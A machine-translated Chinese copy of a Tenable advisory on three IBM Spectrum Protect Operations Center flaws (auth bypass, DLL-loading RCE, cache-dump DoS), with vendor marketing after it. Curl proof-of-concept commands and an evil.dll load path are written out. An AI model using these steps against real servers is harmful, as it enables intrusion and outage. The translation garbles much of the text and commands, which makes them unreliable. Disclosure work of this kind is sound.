脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

IBM频谱保护操作中心

高位

简表

CVE-2020-4954:验证旁路

sv3向量:(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

CVSSv3基准分数6.5

安装后操作中心需要配置频谱保护服务器通过webUI作为其中心服务器配置期间,枢纽服务器IP:港务和行政证书用于访问枢纽服务器操作中心连接中心服务器后,用户可使用中心服务器存储的行政证书登录中心

非认证远程攻击者仍可登录操作中心,中心已通过URL端点/oc/配置配置中心配置中心服务器攻击者搭建Spectrum保护服务器并提供配置页中的IP:port和证书允许攻击者获取操作中心认证会议

登录后,攻击者似乎无法执行需要访问配置中心服务器的操作,因为登录会话有攻击者证书,与为中心服务器配置的证书不匹配。s/he可执行无需中心服务器访问的其他认证操作攻击者可启动OpsCntrLog.config并查看日志内容

使用下列步骤获取操作中心认证会议

a) 获取登录JESSIONID和xtoken

curl-kis-tlsv1.2'
              
               :11090/oc/configuration' | egrep 'JSESSIONID|xtoken'  Set-Cookie: JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3!路径s/oc安全安全htp唯一
               
              

登录操作中心使用攻击者控制频谱保护服务器证书302=成功

curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host:
              
               11090-HORIGIN:
               
                11090-d连接
                
                 3A1500&login
                 
                  密码=
                  
                   &useSSL=true&useTLS12Only=true&tzoffset=300&nextURL=&xtoken=EEEEFFED-645A-4514-955C-C336EF236403' -D - -o /dev/null 'https://
                   
                    HTTP1.1302发现X-FRAME-Options:SAMEORIGIN X-XSS-protectiveX-Content-Type-Objects:Nosniff内容安全-策略连接src wss:Ing-src'self数据:*字体弧自数据 :report-uri csp-report Strict-Transport-Security: max-age=31536000!包括子域位置:httpss/
                    
                     :11090/oc/gui#configure
                    
                   
                  
                 
                
               
              

CVE-2020-4955:QueryReadStoreCache认证RCE

sv3向量:(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVSSv3基准分数8.8

认证远程攻击者可以向/oc/QueryReadStoreCache/发送特制HTTPP消息,加载攻击者控制库文件(即DLL)到操作中心进程,导致远程代码执行

下片段显示易损性 :

无效控件Post(最后HtpServlet请求重q,最后HtpServlet响应ssp)扔ServletExceptive,IOExceptition{QueryReadStoreCache.log.logginfo+reqfinalStringsservationuriservice至少需要四条路径{最终地图参数s=req.getParametermap终极字符串服务器Name=req.getParaeter决赛类
              类Stance=类.forName(url[3])final方法=类Instance.getMethod(url[4])
              [])QueryReadStoreCache.CLASS_ARGUMENT)!final JSONArray list = JSONUtils.getFirstItemsArray(((JSONString)method.invoke(null, serverName)).toString())![.]

POST处理器从 URL提取ava类(url[3)和该类方法名(url[4)并引用方法方法应该是静态方法,取单参数,由server URL参数提供攻击者向 URL/oc/QueryReadStoreCache/java.lang.system/加载server参数 some_share\evil.dll,攻击者控制邪恶DLL被加载到操作中心进程中,通向RCE

与弱点1并用时,攻击者可以在操作中心账户安全方面实现非认证RCE(即Windows系统账户)。

CVE-2020-4956:调试RPC认证远程DOS

sv3向量:(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)

CVSSv3基准分数7.1

验证攻击者可发布setCachevalueRPC调用以设置操作中心缓存大值并反复发布dumpCache调用以创建运算中心主机大片缓存文件可填充缓存倾置文件存放文件系统,通向 DoS

与弱点1并用时,攻击者可实现非认证远程DOS

步骤创建缓存倾置文件

a) 从弱点1获取经认证JESSIONID和xtoken

(b) 有了经认证JESSIONID操作中心后,我们可以在SPOC缓存中创建大型缓存

echo -en '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"setCacheValue","methodArgs":["KEY1","'$(python3 -c "print('A'*10000000)")'"]}' > /tmp/cacheValue1  curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host:
              
               11090-HORIGIN:
               
                11090'-Hxtoken:EEEFFED-645A-4514-955C-C336EF236403'-HCente-Type应用/json-rpc'-d
                
                 :11090/oc/RPCAdapter'
                
               
              

多次倾弃缓存

实事求是ssv1.2-cookiejsQsYD8Jr60DyZAj15mXa:50e18252-bc-4523-a0b-79391fec3
              
               11090-HORIGIN:
               
                :11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"dumpCache","methodArgs":[]}' --compress 'https://
                
                 :11090/oc/RPCAdapter'!完成后
                
               
              

对每个转储点都用临时文件夹创建不同的转储文件攻击者通过创建一个或多个自选大小缓存values控制倾置文件大小可填充文件系统并通达DOS

C:Windows\System32\config系统剖面数\AppData\Loblical\Tems>dir+卷序号为 1A68-87EC目录C:\WindowsSystem32\config\sy
              
               .11/13/202012:18
               
                .11/13/201214缓存10,107,457缓存10,107,270737956t11/13201214AM10,107,457缓存1052269323425.txt11/13/20201215AM10,107457缓存101140866720073.txt11/13201212107457缓存10,107105179666375.t
               
              

求解

升级至7.11.000、8.11.200或8.11.100For further information, visit https://www.ibm.com/support/pages/node/6404966.

披露时间线

11/16/2020-向IBMPSIRT报告易损性90天日期定在2021年2月15日
11/16/2020-IBM感谢我们发送报告他们将审查并跟踪分析
12/04/2020-可耐性请求更新
12/09/2020-IBM确认漏洞并正在开发修复计划请求在公开披露前提供补救机会
12/09/2020-可接受感恩IBM确认澄清我们的披露策略 并打算在2021年2月15日发布
01/04/2021-可点名请求更新
01/22/2021-IBM仍在审查漏洞等解决后,他们想联系我们请求在公开披露前提供补救机会
02/08/2021-可租性提醒IBM即将发布90天日期询问补丁准备

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA-2021-03
sv3基础/时间评分
8.8/7.9
CVSSv3向量
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
受影响产品
IBM频谱保护中心
IBM频谱保护中心
风险因子
高位

咨询时间线

02/15/2021咨询发布
04/23/2021-更新受影响/修复版本

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map